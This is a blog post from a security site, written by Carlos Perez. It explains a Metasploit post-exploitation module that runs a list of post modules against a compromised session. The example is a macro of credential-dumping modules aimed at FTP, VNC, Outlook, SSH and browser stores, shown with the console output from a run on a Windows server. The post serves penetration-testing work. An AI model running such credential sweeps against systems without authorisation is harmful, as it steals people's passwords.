Running MultiplePost Modules
Friday, December 16, 2011 at 4:43PM
Carlos Perez

A Module I wrote to simplify the running of multiple post modules against a session for users that did not want to learn how to code ruby or wanted to learn the API to build a resource file to achieve this could use something simpler for them to achieve this task. The module is called multi_post. Lets load the module and see the options it has:

msf > use post/multi/manage/multi_post 
msf  post(multi_post) > info

       Name: Multi Manage Post Module Macro Execution
     Module: post/multi/manage/multi_post
    Version: 14287
   Platform: Windows, Unix, OSX, Linux, Solaris
       Arch: 
       Rank: Normal

Provided by:
  carlos_perez <carlos_perez@darkoperator.com>

Description:
  This module will execute a list of modules given in a macro file in 
  the format of < module > < opt=val,opt=val > against the select session 
  checking for compatibility of the module against the sessions and 
  validation of the options provided.


msf  post(multi_post) > show options 

Module options (post/multi/manage/multi_post):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   MACRO                     yes       File with Post Modules and Options to run in the session
   SESSION                   yes       The session to run this module on.

As we can see it takes a macro file where each post module and its options are written one per line in the format of < module > < opt=val,opt=val > lets create a macro for running all password dumping credentials. The Macro would look something like this:

post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/winscp
post/windows/gather/credentials/windows_autologin
post/windows/gather/credentials/vnc
post/windows/gather/credentials/trillian
post/windows/gather/credentials/total_commander
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/outlook
post/windows/gather/credentials/nimbuzz
post/windows/gather/credentials/mremote
post/windows/gather/credentials/imail
post/windows/gather/credentials/idm
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/meebo
post/windows/gather/credentials/coreftp
post/windows/gather/credentials/imvu
post/windows/gather/credentials/epo_sql
post/windows/gather/enum_ie
post/multi/gather/ssh_creds
post/multi/gather/pidgin_cred
post/multi/gather/firefox_creds
post/multi/gather/filezilla_client_cred

Now we save the file as cred_dump.rc and so we can use it in the module:

msf  post(multi_post) > set MACRO /Users/carlos/cred_dump.rc
MACRO => /Users/carlos/cred_dump.rc
msf  post(multi_post) > set SESSION 1
SESSION => 1
msf  post(multi_post) > run

[*] Running module against WIN2K8R2-01
Loading post/windows/gather/credentials/wsftp_client
Running Against 1
[*] Checking Default Locations...
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
Loading post/windows/gather/credentials/winscp
Running Against 1
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
Loading post/windows/gather/credentials/windows_autologin
Running Against 1
[*] Running against WIN2K8R2-01 on session 1
[-] Post failed: NameError undefined local variable or method `d02' for #<#<Module:0x007fc88b0c0e78>::Metasploit3:0x007fc88fd80898>
[-] Call stack:
[-]   /Users/carlos/Development/msf4/modules/post/windows/gather/credentials/windows_autologin.rb:95:in `run'
Loading post/windows/gather/credentials/vnc
Running Against 1
[*] Enumerating VNC passwords on WIN2K8R2-01
[*] Checking UltraVNC...
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[*] Checking TightVNC_HKLM_Control_pass...
[*] Checking RealVNC_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC4_S-1-5-21-3759490038-1939265364-4245280780-500...
[*] Checking WinVNC_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500_Default...
[*] Checking WinVNC3_S-1-5-21-3759490038-1939265364-4245280780-500...

. . . . . .

[*] Checking for Firefox directory in: C:\Users\Administrator\AppData\Roaming\Mozilla\
[-] Firefox not found
Loading post/multi/gather/filezilla_client_cred
Running Against 1
[*] Checking for Filezilla directory in: C:\Users\Administrator\AppData\Roaming
[*] No users found with a FileZilla directory
[*] Post module execution completed
msf  post(multi_post) >

As we can see this can be helpful if one wants to create quick macro files to run collections of post modules and use them in automated fashion like with AutoRunScript for when running exploits or setting a multi handler.

As always I hope you find this information useful.

Article originally appeared on Security and Networking (http://darkoperator.squarespace.com/).
See website for complete article licensing information.